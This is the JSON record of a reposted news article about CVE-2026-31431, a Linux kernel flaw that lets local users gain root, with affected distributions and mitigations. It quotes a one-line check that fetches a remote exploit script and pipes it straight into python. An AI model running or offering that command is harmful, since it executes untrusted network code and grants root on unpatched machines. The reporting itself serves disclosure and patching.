{"id":247713,"date":"2026-05-01T03:00:00","date_gmt":"2026-05-01T07:00:00","guid":{"rendered":"https:\/\/news-you-need.com\/index.php\/2026\/05\/01\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\/"},"modified":"2026-05-17T16:01:14","modified_gmt":"2026-05-17T20:01:14","slug":"linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users","status":"publish","type":"post","link":"https:\/\/news-you-need.com\/index.php\/2026\/05\/01\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\/","title":{"rendered":"Linux exploit instantly grants administrator access on most distributions since 2017 \u2014 cryptography optimization snafu grants root privileges to local users"},"content":{"rendered":"<p><a href=\"https:\/\/www.tomshardware.com\/tech-industry\/cyber-security\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\">Linux exploit instantly grants administrator access on most distributions since 2017 \u2014 cryptography optimization snafu grants root privileges to local users<\/a><\/p>\n<p><a href=\"https:\/\/www.tomshardware.com\/tech-industry\/cyber-security\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\">https:\/\/www.tomshardware.com\/tech-industry\/cyber-security\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users<\/a><\/p>\n<p>Publish Date: <a href=\"publish_date]\">2026-05-01 03:00:00<\/a><\/p>\n<p>Source Domain: <a href=\"www.tomshardware.com\">www.tomshardware.com<\/a><\/p>\n<p id=\"elk-011a6ed8-2adf-4e01-977e-3d00147b7e37\">It is quite an interesting patch week for Linux systems administrators out there. Researchers at Xint Code have discovered a nasty exploit that instantly grants root access to any local unprivileged user, a nightmare scenario for multi-user servers of various types, including web servers, container environments like Kubernetes, CI\/CD pipelines, and more.<\/p>\n<p>The CVE-2026-31431 exploit affects pretty much every Linux distro currently in use and has existed since 2017. Although it&#8217;s not a zero-day and the kernel has already gotten a patch, the short disclosure window gave distro makers relatively little time to react. Affected variants include (but aren&#8217;t limited to) Ubuntu 24 (version 26 was just released last week), RHEL 10, Suse 16, and Amazon Linux 2023. Even Windows&#8217; WSL2 is affected, and all it takes is 732 bytes to do it.<\/p>\n<p id=\"elk-011a6ed8-2adf-4e01-977e-3d00147b7e37-2\">To check that a system is vulnerable, you can just run &#8220;curl https:\/\/copy.fail\/exp | python3 &#038;&#038; su&#8221; with a standard unprivileged account \u2014 though we should note that you&#8217;re trusting an online script. The source code for the proof-of-concept is available here if you prefer. If your distro doesn&#8217;t have a patch available yet, you can try one of two mitigation methods.<\/p>\n<p><span class=\"inline-flex items-center gap-1.5 text-sm font-article-heading capitalize leading-5 text-white whitespace-nowrap\"><span class=\"jwp-carousel-title-mobile\"\/><span class=\"jwp-carousel-title-desktop\">Latest Videos From<\/span><span class=\"jwp-carousel-brand inline-flex items-center\" aria-hidden=\"true\"><\/span><\/span><img decoding=\"async\" src=\"https:\/\/www.tomshardware.com\/media\/img\/brand_logo.svg\" alt=\"\" class=\"max-h-12 w-auto\" aria-hidden=\"true\"\/><br \/>\n        <span class=\"\n            flex\n            after:content-[''] after:flex-1 after:ml-4 after:my-[0.7rem] after:border-t after:border-solid after:border-t-[#ccc]\n            before:content-[''] before:flex-1 before:mr-4 before:my-[0.7rem] before:border-t before:border-solid before:border-t-[#ccc]\n            font-article-heading pb-0 text-[length:var(--article-river-title--font-size,1em)] uppercase sm:text-[length:var(--article-river-title--font-size,0.875em)] font-bold\n        \"><br \/>\n            You may like<br \/>\n        <\/span><\/p>\n<p class=\"paywall\" aria-hidden=\"true\">If your kernel loads algif_aaed as a module, a simple [ echo &#8220;install algif_aead \/bin\/false&#8221;  \/etc\/modprobe.d\/disable-algif.conf ] will suffice. Some distributions, however, compile that functionality right into the kernel core, including RHEL and WSL2. That means that in those instances, you&#8217;ll have to resort to disallowing users from opening AF_ALG sockets to begin with, via seccomp profiles, AppArmor, or SELinux.<\/p>\n<p class=\"paywall\" aria-hidden=\"true\">Although the Xint Code security team didn&#8217;t provide a rationale for publicly disclosing the vulnerability so early, they did mention that they found it with the help of an AI assistant. Given that the source code for the Linux kernel is by definition public, in theory, any serious attacker would&#8230;<\/p>\n<p><a href=\"https:\/\/www.tomshardware.com\/tech-industry\/cyber-security\/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users\">Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Linux exploit instantly grants administrator access on most distributions since 2017 \u2014 cryptography optimization snafu&#8230;<\/p>\n","protected":false},"author":1,"featured_media":247714,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/cdn.mos.cms.futurecdn.net\/iMxEdJKjjPfdmwRbtJFnhh-2122-80.jpg","fifu_image_alt":"","footnotes":""},"categories":[48],"tags":[90,31,71,57,79,27],"class_list":["post-247713","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-linux","tag-cve","tag-exploit","tag-linux","tag-security","tag-ubuntu","tag-vulnerability"],"_links":{"self":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/247713"}],"collection":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/comments?post=247713"}],"version-history":[{"count":1,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/247713\/revisions"}],"predecessor-version":[{"id":247715,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/247713\/revisions\/247715"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media\/247714"}],"wp:attachment":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media?parent=247713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/categories?post=247713"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/tags?post=247713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}